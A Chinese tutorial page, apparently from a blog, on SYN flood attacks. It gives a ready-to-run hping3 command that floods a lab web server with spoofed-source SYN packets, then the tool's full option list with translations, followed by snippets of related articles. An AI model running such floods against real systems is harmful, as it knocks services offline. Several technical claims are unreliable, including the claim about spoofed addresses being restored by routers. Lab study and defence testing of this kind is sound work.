文章目录

使用HPING进行压力测试
hping3参数
参考来源

SYN Flood原理：
客户端向服务端发送大量SYN请求，服务端响应SYN+ACK然后进入SYN-RCVD状态等待客户端进行三次握手最后一步。发送大量SYN请求就会导致服务器产生大量SYN-RCVD队列，直至将服务器的队列资源耗尽达到DOS攻击的目的。

hping3是一个命令行下使用的TCP/IP数据包组装/分析工具，通常web服务会用来做压力测试使用，也可以进行DOS攻击的实验。同样Hping只能每次扫描一个目标。

使用HPING进行压力测试

我们先测试网站正常访问
kali安装httpd服务进行测试。

[root@kali]# yum install -y httpd[root@kali]# systemctl start httpd

浏览器访问 http://192.168.1.63/
对 http://192.168.1.63/ 进行压力测试

hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.63

-c 1000 = 发送的数据包的数量。

-d 120 = 发送到目标机器的每个数据包的大小。单位是字节

-S = 只发送SYN数据包。

-w 64 = TCP窗口大小。

-p 80 = 目的地端口(80是WEB端口)。你在这里可以使用任何端口。

–flood = 尽可能快地发送数据包，不需要考虑显示入站回复。洪水攻击模式。

–rand-source = 使用随机性的源头IP地址。这里的伪造的IP地址，只是在局域网中伪造。通过路由器后，还会还原成真实的IP地址。

我们再次刷新网页发现加载速度已经变慢。
Ctrl+c停止后即可访问速度正常。

hping3参数

root@kali:~# hping3 -h
usage: hping3 host [options]-h  --help      show this help-v  --version   show version-c  --count     packet count-i  --interval  wait (uX for X microseconds, for example -i u1000)--fast      alias for -i u10000 (10 packets for second)--faster    alias for -i u1000 (100 packets for second)--flood      sent packets as fast as possible. Don't show replies.-n  --numeric   numeric output-q  --quiet     quiet-I  --interface interface name (otherwise default routing interface)-V  --verbose   verbose mode-D  --debug     debugging info-z  --bind      bind ctrl+z to ttl           (default to dst port)-Z  --unbind    unbind ctrl+z--beep      beep for every matching packet received
Modedefault mode     TCP-0  --rawip      RAW IP mode-1  --icmp       ICMP mode-2  --udp        UDP mode-8  --scan       SCAN mode.Example: hping --scan 1-30,70-90 -S www.target.host-9  --listen     listen mode
IP-a  --spoof      spoof source address--rand-dest      random destionation address mode. see the man.--rand-source    random source address mode. see the man.-t  --ttl        ttl (default 64)-N  --id         id (default random)-W  --winid      use win* id byte ordering-r  --rel        relativize id field          (to estimate host traffic)-f  --frag       split packets in more frag.  (may pass weak acl)-x  --morefrag   set more fragments flag-y  --dontfrag   set don't fragment flag-g  --fragoff    set the fragment offset-m  --mtu        set virtual mtu, implies --frag if packet size > mtu-o  --tos        type of service (default 0x00), try --tos help-G  --rroute     includes RECORD_ROUTE option and display the route buffer--lsrr           loose source routing and record route--ssrr           strict source routing and record route-H  --ipproto    set the IP protocol field, only in RAW IP mode
ICMP-C  --icmptype   icmp type (default echo request)-K  --icmpcode   icmp code (default 0)--force-icmp send all icmp types (default send only supported types)--icmp-gw    set gateway address for ICMP redirect (default 0.0.0.0)--icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)--icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)--icmp-help  display help for others icmp options
UDP/TCP-s  --baseport   base source port             (default random)-p  --destport   [+][+]<port> destination port(default 0) ctrl+z inc/dec-k  --keep       keep still source port-w  --win        winsize (default 64)-O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)-Q  --seqnum     shows only tcp sequence number-b  --badcksum   (try to) send packets with a bad IP checksummany systems will fix the IP checksum sending the packetso you'll get bad UDP/TCP checksum instead.-M  --setseq     set TCP sequence number-L  --setack     set TCP ack-F  --fin        set FIN flag-S  --syn        set SYN flag-R  --rst        set RST flag-P  --push       set PUSH flag-A  --ack        set ACK flag-U  --urg        set URG flag-X  --xmas       set X unused flag (0x40)-Y  --ymas       set Y unused flag (0x80)--tcpexitcode    use last tcp->th_flags as exit code--tcp-mss        enable the TCP MSS option with the given value--tcp-timestamp  enable the TCP timestamp option to guess the HZ/uptime
Common-d  --data       data size                    (default is 0)-E  --file       data from file-e  --sign       add 'signature'-j  --dump       dump packets in hex-J  --print      dump printable characters-B  --safe       enable 'safe' protocol-u  --end        tell you when --file reached EOF and prevent rewind-T  --traceroute traceroute mode              (implies --bind and --ttl 1)--tr-stop        Exit when receive the first not ICMP in traceroute mode--tr-keep-ttl    Keep the source TTL fixed, useful to monitor just one hop--tr-no-rtt       Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)--apd-send       Send the packet described with APD (see docs/APD.txt)

hping3 host [options]-h  --help          显示帮助-v  --version       显示版本-c  --count         发送数据包的数目-i  --interval      发送数据包间隔的时间 (uX即X微秒, 例如： -i u1000)--fast          等同 -i u10000 (每秒10个包)--faster       等同 -i u1000 (每秒100个包)--flood        尽最快发送数据包，不显示回复-n  --numeric      数字化输出，象征性输出主机地址-q  --quiet           安静模式-I  --interface     网卡接口 (默认路由接口)-V  --verbose      详细模式-D  --debug         调试信息-z  --bind          绑定 ctrl+z 到 ttl (默认为目的端口)-Z  --unbind          取消绑定 ctrl+z 键--beep            对于接收到的每个匹配数据包蜂鸣声提示模式选择  default mode        默认模式是TCP-0  --rawip         RAW IP模式，原始IP模式。在此模式下Hping3会发送带数据的IP头。即裸IP方式。使用RAWSOCKET方式-1  --icmp         ICMP模式，此模式下Hping3会发送IGMP应答报，你可以用 --icmptype,--icmpcode 选项发送其他类型/模式的ICMP报文-2  --udp            UDP模式，默认Hping3会发送UDP报文到主机的0端口，你可以用 --baseport,--destport,--keep 选项指定端口-8  --scan          扫描模式，扫描指定的端口Example: hping3 --scan 1-30,70-90 -S www.target.host-9  --listen         监听模式IP 模式  -a  --spoof          源地址欺骗。伪造自身IP，对目的进行攻击，防火墙就不会记录你的真实IP了，当然回应的包你也接收不到了--rand-dest      随机目的地址模式，详细使用 man 命令--rand-source    随机源地址模式，详细使用 man 命令-t  --ttl             指定 ttl 值 (默认 64)-N  --id            hping3 中的 ID 值，缺省为随机值-W  --winid         使用 win* id 字节顺序，针对不同的操作系统。UNIX,WINDIWS的id回应不同，这选项可以让你的ID回应和WINDOWS一样-r  --rel             相对id字段(用于评估主机流量)  //更改ID的，可以让ID曾递减输出，详见HPING-HOWTO-f  --frag          将数据包拆分成更多的frag，可能通过弱访问控制列表（acl）    //分段，可以测试对方或者交换机碎片处理能力，缺省16字节-x  --morefrag       设置更多的分段标志    //大量碎片，泪滴攻击-y  --dontfrag       设置不分段标志    //发送不可恢复的IP碎片，这可以让你了解更多的MTU PATH DISCOVERY-g  --fragoff       set the fragment offset    //设置断偏移-m  --mtu             设置虚拟最大传输单元，当大于MTU时分段；如果数据包大于MTU，等同于使用 --frag 选项-o  --tos           tos字段，服务类型，缺省值为0x00，通过 hping3 --tos help 命令查看详细-G  --rroute            记录IP路由，并显示路由缓冲--lsrr         松散源路由并记录路由 (loose source routing and record route)--ssrr            严格源路由并记录路由 (strict source routing and record route)-H  --ipproto        设置IP协议字段，仅在RAW IP模式下使用ICMP 模式-C  --icmptype      icmp类型，默认回显(echo)请求-K  --icmpcode        icmp代号，默认0--force-icmp   发送所有icmp类型(默认仅发送支持的类型)--icmp-gw         设置ICMP重定向网关地址(默认0.0.0.0)--icmp-ts       等同 --icmp --icmptype 13 (ICMP 时间戳)--icmp-addr       等同 --icmp --icmptype 17 (ICMP 地址子网掩码)--icmp-help    显示其他icmp选项帮助UDP/TCP 模式-s  --baseport        设置源端口，默认为随机源端口-p  --destport     设置目的端口，默认端口为0-k  --keep          保持源端口不变-w  --win            win的滑动窗口。windows发送字节(默认64)-O  --tcpoff          set fake tcp data offset(instead of tcphdrlen / 4)    //设置伪造tcp数据偏移量(取代tcp地址长度/4)-Q  --seqnum       仅显示tcp序列号-b  --badcksum     (尝试)发送具有错误IP校验和的数据包，所以你会得到错误UDP/TCP校验和。但是许多系统会修复发送数据包的IP校验和-M  --setseq          设置TCP序列号-L  --setack        set TCP ack，不是 TCP 的 ACK 标志位-F  --fin            set FIN flag  -S  --syn             set SYN flag  -R  --rst             set RST flag  -P  --push            set PUSH flag  -A  --ack            set ACK flag，设置 TCP 的 ACK 标志位-U  --urg           set URG flag      //一大堆IP报头的设置-X  --xmas            set X unused flag (0x40)-Y  --ymas          set Y unused flag (0x80)--tcpexitcode     使用last tcp->th_flags 作为退出码--tcp-mss         使用给定的值启用TCP MSS选项--tcp-timestamp   启用TCP时间戳选项来猜测HZ/uptime通用设置  -d  --data          发送数据包的大小，默认为0-E  --file          发送指定文件内的数据-e  --sign            添加“签名”-j  --dump            转储为十六进制数据包-J  --print           转储为可打印字符-B  --safe          启用“安全”协议-u  --end           告诉你什么时候--file达到EOF并防止倒回-T  --traceroute     traceroute模式(等同使用 --bind 且 --ttl 1)--tr-stop        在traceroute模式下，收到第一个非ICMP报文时退出--tr-keep-ttl  保持源TTL固定，仅用于监视一跳--tr-no-rtt      不要在traceroute模式下计算或显示RTT信息ARS packet description (new, unstable)--apd-send      发送用APD描述的数据包(参见docs/APD.txt)

参考来源

DDOS攻击如何防御

Linux网络命令之Hping3

ICMP攻击实战及其简略防御方法

模拟SYN洪流攻击实验

hping3进行SYN Flood攻击相关推荐

SYN Flood攻击
1.攻击原理 SYN Flood是拒绝服务攻击的一种,所谓拒绝服务攻击,即想办法让目标机器停止提供服务这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,使被攻击方资源耗尽(CPU满负荷或内存 ...
DDOS SYN Flood攻击、DNS Query Flood， CC攻击简介——ddos攻击打死给钱。限网吧、黄网、博彩，，，好熟悉的感觉有木有...
摘自:https://zhuanlan.zhihu.com/p/22953451 首先我们说说ddos攻击方式,记住一句话,这是一个世界级的难题并没有解决办法只能缓解 DDoS(Distributed ...
pythonddos防御_浅谈拒绝服务攻击的原理与防御（7）：用Python和C实现syn flood攻击...
01 前言以前做DDOS的实验都是用python来编写工具的,开始不会编写结构不会算校验和的时候就用scapy写,后来学会了报文结构开始自己构造各种报文,但是用python写成之后虽然是能实现基本功 ...
浅谈iptables防SYN Flood攻击和CC攻击
何为syn flood攻击: SYN Flood是一种广为人知的DoS(拒绝服务攻击)是DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻 ...
重学TCP协议（10）SYN flood 攻击
1.SYN flood 攻击 SYN Flood(半开放攻击)是一种拒绝服务(DDoS)攻击,其目的是通过消耗所有可用的服务器资源使服务器不可用于合法流量.通过重复发送初始连接请求(SYN)数据包,攻 ...
TCP/IP：TCP SYN Flood攻击原理与实现
目录三次握手过程 SYN Flood攻击原理 SYN Flood攻击实验 1. 初始化 IP 头部 2. 初始化 TCP 头部 3. 初始化 TCP 伪首部 4. 构建 SYN 包 5. 创建原始套 ...
php攻击方式及防御方法,Syn Flood 攻击及其一般防御方法
防火墙通知受到Syn Flood攻击,并解释说: A SYN Flood is an attempt to consume memory and resources. A Normal TCP/IP ...
syn flood攻击原理及防范
sync攻击原理 DoS是Denial of Service的简称,即拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务.最常见的DoS攻击有计算机网络带宽攻击和 ...
SYN Flood攻击原理及防御技术
SYN泛洪一直是互联网上最常见也是最经典的DDoS攻击方式.这种攻击通过向服务器发送大量tcp请求连接报文(源IP一般是离散的),服务器为每一条连接分配资源最终导致内存耗尽而无法为后续的合法请求建立连 ...
syn flood 攻击 c 语言源代码,以太网模拟syn flood攻击
以太网模拟syn flood攻击 (2012-06-08 00:55:49) 标签: 以太网杂谈以太网模拟syn flood攻击最近在网上找了一些模拟syn flood攻击的c语言源代码,顺便写了 ...

hping3进行SYN Flood攻击

文章目录

使用HPING进行压力测试

hping3参数

参考来源

hping3进行SYN Flood攻击相关推荐

最新文章

热门文章